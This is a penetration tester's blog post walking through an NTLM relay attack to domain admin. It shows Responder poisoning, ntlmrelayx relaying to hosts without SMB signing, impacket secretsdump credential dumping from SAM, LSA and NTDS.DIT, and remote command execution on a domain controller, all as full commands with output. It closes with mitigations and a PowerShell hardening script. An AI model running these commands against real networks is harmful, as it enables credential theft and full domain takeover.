NTLM Relay to Domain Admin


Short post outlining a technique used on a recent engagement where I was tasked with gaining domain admin privs starting from an unauthenticated standpoint.

Responder is often used on black box/red team engagements to poison LLMNR and NBT-NS name resolution and capture the NTLM authentication attempts ("hashes") this attracts, and it's fairly common to capture standard user or administrator hashes. This post aims to outline how you can take advantage of captured hashes without spending time attempting to crack them, and how compromising one account can lead to full domain control.

NTLM Relay

This attack allows us to relay the NTLM authentications that Responder captures to hosts within the environment that have SMB signing disabled, and to keep the resulting authenticated sessions open if the relayed credentials have the necessary privileges on those hosts. If successful we can then access every machine the captured account can access, with the same privileges as that account. The combination of legacy name-resolution protocols and the lack of SMB signing is what makes this attack possible.

A couple of minor alterations are required to the /etc/responder/Responder.conf file shown below:

[Responder Core]

; Servers to start
SQL = On
SMB = Off  ; Off instead of On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off  ; Off instead of On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On

CrackMapExec can be used to create a list of hosts within the environment with SMB signing disabled:

# crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# wc -l targets.txt
39 targets.txt

The 39 hosts within the targets.txt file will be attacked using the captured credentials. With the changes made and the targets identified you’ll then need to run the following two commands in separate terminals:

# responder -I eth1 -r -d -w

# impacket-ntlmrelayx -tf targets.txt -smb2support -debug -socks

You'll want to let these commands run for a while so they have time to gather and relay the captured hashes. Once some authentications have been relayed, running the socks command at the ntlmrelayx prompt lists all of the authenticated sessions you can take advantage of. In this instance the "alice_admin" account was DA, so we essentially have DA access to all of the machines displayed below (if one of those machines is the DC it's pretty much game over):

ntlmrelayx> socks
Protocol  Target         Username         AdminStatus  Port
--------  -------------  ---------------  -----------  ----
SMB       192.168.1.9    DOM/alice_admin  TRUE         445  
SMB       192.168.1.16   DOM/alice_admin  TRUE         445  
SMB       192.168.1.17   DOM/alice_admin  TRUE         445  
SMB       192.168.1.13   DOM/alice_admin  TRUE         445  
SMB       192.168.1.31   DOM/alice_admin  TRUE         445  
SMB       192.168.1.29   DOM/alice_admin  TRUE         445  
SMB       192.168.1.18   DOM/alice_admin  TRUE         445  
SMB       192.168.1.19   DOM/alice_admin  TRUE         445  
SMB       192.168.1.22   DOM/alice_admin  TRUE         445  
SMB       192.168.1.5    DOM/alice_admin  TRUE         445  
SMB       192.168.1.42   DOM/alice_admin  TRUE         445  
SMB       192.168.1.6    DOM/alice_admin  TRUE         445  
SMB       192.168.1.2    DOM/alice_admin  TRUE         445  
SMB       192.168.1.24   DOM/alice_admin  TRUE         445  
SMB       192.168.1.7    DOM/alice_admin  TRUE         445  
SMB       192.168.1.21   DOM/alice_admin  TRUE         445  
SMB       192.168.1.28   DOM/alice_admin  TRUE         445  
SMB       192.168.1.41   DOM/alice_admin  TRUE         445  
SMB       192.168.1.30   DOM/alice_admin  TRUE         445  
SMB       192.168.1.4    DOM/alice_admin  TRUE         445  
SMB       192.168.1.53   DOM/alice_admin  TRUE         445  
SMB       192.168.1.57   DOM/alice_admin  TRUE         445  
SMB       192.168.1.99   DOM/alice_admin  TRUE         445  
SMB       192.168.1.94   DOM/alice_admin  TRUE         445  
SMB       192.168.1.33   DOM/alice_admin  TRUE         445  
SMB       192.168.1.25   DOM/alice_admin  TRUE         445  
SMB       192.168.1.11   DOM/alice_admin  TRUE         445  
SMB       192.168.1.34   DOM/alice_admin  TRUE         445  
SMB       192.168.1.68   DOM/alice_admin  TRUE         445  
SMB       192.168.1.12   DOM/alice_admin  TRUE         445  
SMB       192.168.1.248  DOM/alice_admin  TRUE         445  
SMB       192.168.1.247  DOM/alice_admin  TRUE         445  
SMB       192.168.1.210  DOM/alice_admin  TRUE         445  

You’ll have to ensure your /etc/proxychains4.conf file is configured to use the default port 1080 for ntlmrelayx socks functionality:

[ProxyList]
socks4  127.0.0.1 1080

Once that’s done you can use Impacket’s smbclient to access a host’s file system:

# proxychains4 impacket-smbclient DOM/alice_admin@192.168.1.41
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: // press Enter at the password prompt or use -no-pass
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.1.41:445  ...  OK
Type help for list of commands
# shares
ADMIN$
C$
E$
IPC$
print$
# use C$
# ls
drw-rw-rw-          0  Wed Nov  6 09:12:54 2019 $Recycle.Bin
-rw-rw-rw-     389332  Mon Sep 16 15:46:21 2019 bootmgr
-rw-rw-rw-          1  Mon Sep 16 15:46:21 2019 BOOTNXT
drw-rw-rw-          0  Mon Sep 16 06:50:39 2019 Documents and Settings
drw-rw-rw-          0  Thu Sep 19 08:32:22 2019 inetpub
-rw-rw-rw- 14495514624  Fri Sep 17 13:34:14 2021 pagefile.sys
drw-rw-rw-          0  Mon Sep 16 12:46:08 2019 PerfLogs
drw-rw-rw-          0  Mon Apr 20 12:31:59 2020 Program Files
drw-rw-rw-          0  Thu Sep 19 17:17:48 2019 Program Files (x86)
drw-rw-rw-          0  Sat Mar 13 09:31:37 2021 ProgramData
drw-rw-rw-          0  Mon Sep 16 06:50:43 2019 Recovery
drw-rw-rw-          0  Sun Sep 19 16:00:28 2021 System Volume Information
drw-rw-rw-          0  Wed Nov  6 14:52:47 2019 Users
drw-rw-rw-          0  Fri Sep 17 12:49:38 2021 Windows

As the relayed account is DA we can simply run secretsdump against every host we have a session for to dump the SAM and LSA secrets. One host's LSA secrets contained the plaintext credentials of another DA account (stored for a service):

# proxychains4 impacket-secretsdump DOM/alice_admin@192.168.1.4 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: // press Enter at the password prompt or use -no-pass
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.1.4:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
<snipped>
[*] _SC_SQLTELEMETRY$EXP 
DOM\bob_admin:bob_admin_password

The "bob_admin" DA account's plaintext credentials could then be used to authenticate to DC02 and dump the NTDS.DIT database, and the primary DA account "dom_admin" was found in the output:

# impacket-secretsdump DOM/bob_admin@192.168.1.8
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: bob_admin_password
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
<snipped>
[*] Using the DRSUAPI method to get NTDS.DIT secrets
<snipped>
DOM\dom_admin:CLEARTEXT:dom_admin_password

The “dom_admin” account could then authenticate to DC01 and that ended the engagement:

# crackmapexec smb 192.168.1.10 -u dom_admin -p dom_admin_password -x whoami
SMB         192.168.1.10    445    DC01             [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC01) (domain:acw.intranet) (signing:True) (SMBv1:True)
SMB         192.168.1.10    445    DC01             [+] DOM\dom_admin:dom_admin_password (Pwn3d!)
SMB         192.168.1.10    445    DC01             [+] Executed command 
SMB         192.168.1.10    445    DC01             DOM\dom_admin

Conclusion

Coming across a DA account with Responder makes this a lot easier, but it should be noted that attack paths also exist from standard user accounts. In that case you will be limited to the privileges and access rights of that user, which will restrict which Impacket tools you're able to use.

This attack can be prevented by disabling legacy name-resolution protocols such as LLMNR and NBT-NS and by enforcing SMB signing on all hosts within the environment, both servers and clients. Note that signing must be required, not merely enabled: "enabled" is the default on non-DC Windows hosts and does not stop relaying, which is why the DC above reports signing:True while 39 member hosts ended up in the relay list.
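As an added example (not code from the original post), the following PowerShell audits and then applies those mitigations on a single Windows host from an elevated session; the function names are my own, and the registry paths are the ones the equivalent Group Policy settings write, so in a domain you would push the same values via GPO rather than per host.

```powershell
# Added example: audit and enforce the three settings the relay attack depends on.
# Run in an elevated PowerShell session on a Windows host.

function Get-RelayExposure {
    # Returns the current state of each relay-relevant setting as one object.
    $srv = Get-SmbServerConfiguration
    $cli = Get-SmbClientConfiguration
    $llmnr = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' `
                -Name EnableMulticast -ErrorAction SilentlyContinue
    # NetbiosOptions per interface: 0 = follow DHCP, 1 = enabled, 2 = disabled
    $nbt = Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
           ForEach-Object { (Get-ItemProperty $_.PSPath -Name NetbiosOptions).NetbiosOptions }
    [pscustomobject]@{
        SmbServerRequiresSigning = $srv.RequireSecuritySignature
        SmbClientRequiresSigning = $cli.RequireSecuritySignature
        LlmnrDisabled            = ($null -ne $llmnr -and $llmnr.EnableMulticast -eq 0)
        NbtNsDisabledOnAllNics   = (@($nbt | Where-Object { $_ -ne 2 }).Count -eq 0)
    }
}

function Set-RelayHardening {
    # Require (not merely enable) SMB signing on both the server and client side;
    # "enabled" alone is the default and still allows the session to be relayed.
    Set-SmbServerConfiguration -EnableSecuritySignature $true -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -EnableSecuritySignature $true -RequireSecuritySignature $true -Force

    # Disable LLMNR (same value the "Turn off multicast name resolution" policy sets)
    $dnsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
    New-Item -Path $dnsPolicy -Force | Out-Null
    Set-ItemProperty -Path $dnsPolicy -Name EnableMulticast -Value 0 -Type DWord

    # Disable NetBIOS over TCP/IP (and with it NBT-NS) on every interface;
    # this takes effect after the adapters are reset or the host is rebooted.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        ForEach-Object { Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 -Type DWord }
}

# Show the state before, apply the hardening, then show it again.
Get-RelayExposure
Set-RelayHardening
Get-RelayExposure
```

Any host whose audit object still shows SmbServerRequiresSigning as False would appear in a list like the one crackmapexec generated above.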